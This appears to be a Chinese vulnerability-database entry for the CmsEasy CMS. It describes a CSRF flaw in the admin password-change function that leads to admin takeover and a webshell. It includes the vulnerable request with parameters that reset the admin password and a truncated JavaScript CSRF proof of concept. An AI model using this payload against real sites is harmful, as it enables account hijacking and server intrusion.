Cmseasy建站系统csrf获取管理权限后台getshell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: Cmseasy建站系统csrf获取管理权限后台getshell ### 详细说明: 在修改管理密码处存在csrf漏洞 http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default post: onlymodify=&username=admin&passwordnew=456456&nickname=%E7%AE%A1%E7%90%86%E5%91%98&question=&answer=&groupid=2&qq=0&e_mail=&tel=&submit=%E6%8F%90%E4%BA%A4 可通过csrf修改管理密码: ``` function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } return request; }var _x = ajax(); postgo(); function postgo() { src="http://localhost/cmseasy/uploads/index.php?case=table&act=edit&table=user&id=1&admin_dir=admin&site=default";...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息